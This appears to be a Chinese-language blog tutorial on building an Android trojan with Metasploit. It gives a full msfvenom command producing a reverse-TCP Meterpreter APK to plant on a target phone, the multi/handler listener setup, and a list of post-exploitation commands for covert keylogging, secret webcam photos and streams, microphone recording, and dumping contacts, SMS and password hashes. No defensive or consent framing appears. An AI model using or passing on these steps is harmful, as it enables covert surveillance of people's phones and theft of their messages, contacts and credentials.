安卓木马的生成

简介: 安卓木马的生成

keyscan_start:开始键盘记录

keyscan_dump:下载键盘记录

keyscan_stop:结束键盘记录

 

record_mic:录制声音(如果目标主机上有话筒的话)

webcam_chat:查看摄像头接口

 

webcam_stream  //开启摄像头

 

webcam_list:查看摄像头列表

webcam_snap //隐秘拍照功能

 

webcam_snap 隐秘拍照功能 -i 1 或者2是开启前置摄像头和后置摄像头的

 

run vnc:开启远程桌面

dump_contacts //导出电话号码

dump_sms  //导出信息

 

 

enumdesktops    -->列出所有可访问的桌面和窗口站(窗体列表)

 

getdesktop      -->得到当前的Meterpreter桌面

 

idletime        -->返回秒远程用户已经闲置数量

 

keyscan_dump    -->转储按键缓冲(下载键盘记录)

 

keyscan_start   -->开始捕获击键(开始键盘记录)

 

keyscan_stop    -->停止捕获击键(停止键盘记录)

 

screenshot      -->抓取交互式桌面截图(当前操作界面截图一张)

 

setdesktop      -->改变meterpreters当前桌面

 

uictl           -->控制一些用户界面组件(获取键盘、鼠标控制权)

 

使用uictl -h 查看帮助(打开/关闭,键盘/鼠标)

 

PS:键盘记录注意点,先开始,后下载,再结束,否则会出错

 

摄像头:Stdapi: Webcam Commands(摄像头命令)

 

record_mic       -->X秒从默认的麦克风record_mic音频记录(音频录制)

 

webcam_chat      -->开始视频聊天(视频,对方会有弹窗)

 

webcam_list      -->单摄像头(查看摄像头列表)

 

webcam_snap      -->采取快照从指定的摄像头(摄像头拍摄一张照片)

 

webcam_stream    -->播放视频流从指定的摄像头(开启摄像头监控)

 

其他命令操作

 

getsystem        -->获取高权限

 

hashdump         -->获取当前用户hash

 

 

 

msfvenom -p android/meterpreter/reverse_tcp LHOST=你kali的ip LPORT=5555 R >

/root/apk.apk

-p 指定payload       r指定存放路径

木马生成好了之后上传到目标手机上

 

msfconsole

然后启动msf:msfconsole  然后输入命令:

1.use exploit/multi/handler   //加载模块

 

2. set payload android/meterpreter/reverse_tcp   //选择Payload

 

3.show options   //查看参数设置

 

这个payload里边有两个参数要设置 LHOST和LPORT 表示地址和端口 默认的端口是4444 现在我们来更改设置

 

1.set LHOST 192.168.1.114   //这里的地址设置成我们刚才生成木马的IP地址

 

2.set LPORT 5555   //这里的端口设置成刚才我们生成木马所监听的端口

 

3.run   //开始执行漏洞 开始监听,等待手机上线

 

查看摄像头个数:webcam_list

下载短信:dump_sms

查看手机版本:sysinfo

拍照:webcom_suap -i 1 (1是后摄

重新连接:run

webcam_stream -i 1 开启视频,1是后摄

相关文章
|
监控 安全 Android开发
安卓渗透
安卓渗透
|
网络协议 Shell 网络安全
越狱(21)
OpenSSH设置
399 0
越狱(21)
|
安全 Android开发 内存技术
“木马下载器”伪装成Adobe Flash Player升级程序,攻击安卓用户
本文讲的是“木马下载器”伪装成Adobe Flash Player升级程序,攻击安卓用户,根据ESET研究所最新研究成果,发现了一种伪装成Adobe Flash Player升级程序的安卓恶意软件下载器。
1810 0
|
安全 Linux Android开发
|
安全 数据安全/隐私保护 iOS开发
|
Android开发
安卓网站
guolin.tech Hencodr.com http://ticktick.blog.51cto.com/823160/1655761  内核分析
846 0